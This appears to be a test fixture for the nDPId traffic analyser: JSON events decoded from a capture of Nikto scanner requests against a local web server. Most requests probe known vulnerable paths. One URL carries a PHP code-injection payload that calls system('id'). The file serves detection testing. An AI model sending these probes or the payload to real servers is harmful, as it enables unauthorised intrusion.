-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_packet_id":1,"flow_last_seen":1576420277495,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277495,"pkt":"AAAAAAAAAAAAAAAACABFAADBe7BAAEAGwIR\/AAABfwAAAcWUH5BTWUN0U4buRIAYAED+tQAAAQEICp1m\/h6dZv4eR0VUIC9saXN0cy9hZG1pbi8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxNykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277495,"flow_last_seen":1576420277495,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277495,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50580,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/lists\/admin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000017)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":510,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277496,"flow_last_seen":1576420277496,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277496,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50582,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_packet_id":1,"flow_last_seen":1576420277496,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277496,"pkt":"AAAAAAAAAAAAAAAACABFAADEE4xAAEAGKKZ\/AAABfwAAAcWWH5AfSitVmmsDJoAYAED+uAAAAQEICp1m\/iCdZv4gR0VUIC9zcGxhc2hBZG1pbi5waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxOCkNCg0K"} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":510,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277496,"flow_last_seen":1576420277496,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277496,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50582,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/splashAdmin.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000018)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":511,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277497,"flow_last_seen":1576420277497,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277497,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50584,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_packet_id":1,"flow_last_seen":1576420277497,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420277497,"pkt":"AAAAAAAAAAAAAAAACABFAAC8mG1AAEAGo8x\/AAABfwAAAcWYH5Bl4KC2nOMxboAYAED+sAAAAQEICp1m\/iGdZv4hR0VUIC9zc2RlZnMvIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDE5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277497,"flow_last_seen":1576420277497,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277497,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50584,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ssdefs\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000019)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":512,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277498,"flow_last_seen":1576420277498,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277498,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50586,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_packet_id":1,"flow_last_seen":1576420277498,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420277498,"pkt":"AAAAAAAAAAAAAAAACABFAAC88otAAEAGSa5\/AAABfwAAAcWaH5CxdspY+6ys9YAYAED+sAAAAQEICp1m\/iKdZv4iR0VUIC9zc2hvbWUvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDIwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277498,"flow_last_seen":1576420277498,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277498,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50586,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/sshome\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000020)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":513,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277499,"flow_last_seen":1576420277499,"flow_idle_time":7440000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277499,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50588,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_packet_id":1,"flow_last_seen":1576420277499,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":200,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":200,"pkt_l4_len":166,"thread_ts_msec":1576420277499,"pkt":"AAAAAAAAAAAAAAAACABFAAC61XNAAEAGZsh\/AAABfwAAAcWcH5BK5u2wb4yQmIAYAED+rgAAAQEICp1m\/iOdZv4jR0VUIC90aWtpLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDIxKQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277499,"flow_last_seen":1576420277499,"flow_idle_time":7440000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277499,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50588,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tiki\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000021)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":514,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277500,"flow_last_seen":1576420277500,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277500,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50590,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":514,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_packet_id":1,"flow_last_seen":1576420277500,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277500,"pkt":"AAAAAAAAAAAAAAAACABFAADKj49AAEAGrJx\/AAABfwAAAcWeH5BxerdT3YbEDoAYAED+vgAAAQEICp1m\/iSdZv4kR0VUIC90aWtpL3Rpa2ktaW5zdGFsbC5waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAyMikNCg0K"} -01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":514,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277500,"flow_last_seen":1576420277500,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277500,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50590,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tiki\/tiki-install.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000022)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":515,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277501,"flow_last_seen":1576420277501,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277501,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50592,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_packet_id":1,"flow_last_seen":1576420277501,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1576420277501,"pkt":"AAAAAAAAAAAAAAAACABFAADQ2RZAAEAGYw9\/AAABfwAAAcWgH5BlMeHM00k6b4AYAED+xAAAAQEICp1m\/iWdZv4lR0VUIC9zY3JpcHRzL3NhbXBsZXMvZGV0YWlscy5pZGMgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAwMjMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277501,"flow_last_seen":1576420277501,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277501,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50592,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/samples\/details.idc","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000023)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":516,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277503,"flow_last_seen":1576420277503,"flow_idle_time":7440000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1576420277503,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50594,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_packet_id":1,"flow_last_seen":1576420277503,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":257,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":257,"pkt_l4_len":223,"thread_ts_msec":1576420277503,"pkt":"AAAAAAAAAAAAAAAACABFAADzlctAAEAGpjd\/AAABfwAAAcWiH5BEoK0q6pkm3YAYAED+5wAAAQEICp1m\/iedZv4nR0VUIC9mb3J1bWRpc3BsYXkucGhwP0dMT0JBTFNcW1xdPTEmZj0yJmNvbW1hPVwiLnN5c3RlbVwoJ2lkJ1wpXC5cIiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDA3MCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01117{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":516,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277503,"flow_last_seen":1576420277503,"flow_idle_time":7440000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1576420277503,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50594,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forumdisplay.php?GLOBALS\\[\\]=1&f=2&comma=\\\".system\\('id'\\)\\.\\\"","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000070)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":517,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277505,"flow_last_seen":1576420277505,"flow_idle_time":7440000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1576420277505,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50596,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_packet_id":1,"flow_last_seen":1576420277505,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":219,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":219,"pkt_l4_len":185,"thread_ts_msec":1576420277505,"pkt":"AAAAAAAAAAAAAAAACABFAADNh+tAAEAGtD1\/AAABfwAAAcWkH5AZpL8K5\/crh4AYAED+wQAAAQEICp1m\/imdZv4oR0VUIC9ndWVzdGJvb2svZ3Vlc3Rib29rLmh0bWwgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAwNzEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277505,"flow_last_seen":1576420277505,"flow_idle_time":7440000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1576420277505,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50596,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/guestbook\/guestbook.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000071)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":518,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277506,"flow_last_seen":1576420277506,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420277506,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50598,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00690{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_packet_id":1,"flow_last_seen":1576420277506,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":1576420277506,"pkt":"AAAAAAAAAAAAAAAACABFAADSOPFAAEAGAzN\/AAABfwAAAcWmH5AZrAAQDbKHy4AYAED+xgAAAQEICp1m\/iqdZv4qR0VUIC9odG1sL2NnaS1iaW4vY2dpY3NvP3F1ZXJ5PUFBQSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDcyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277506,"flow_last_seen":1576420277506,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420277506,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50598,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/html\/cgi-bin\/cgicso?query=AAA","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000072)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":519,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277509,"flow_last_seen":1576420277509,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277509,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50600,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_packet_id":1,"flow_last_seen":1576420277509,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277509,"pkt":"AAAAAAAAAAAAAAAACABFAADGjRRAAEAGrxt\/AAABfwAAAcWoH5A27bX0CottMYAYAED+ugAAAQEICp1m\/i2dZv4sR0VUIC9iYi1kbmJkL2ZheHN1cnZleSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDE0MikNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277509,"flow_last_seen":1576420277509,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277509,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50600,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bb-dnbd\/faxsurvey","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000142)"}} 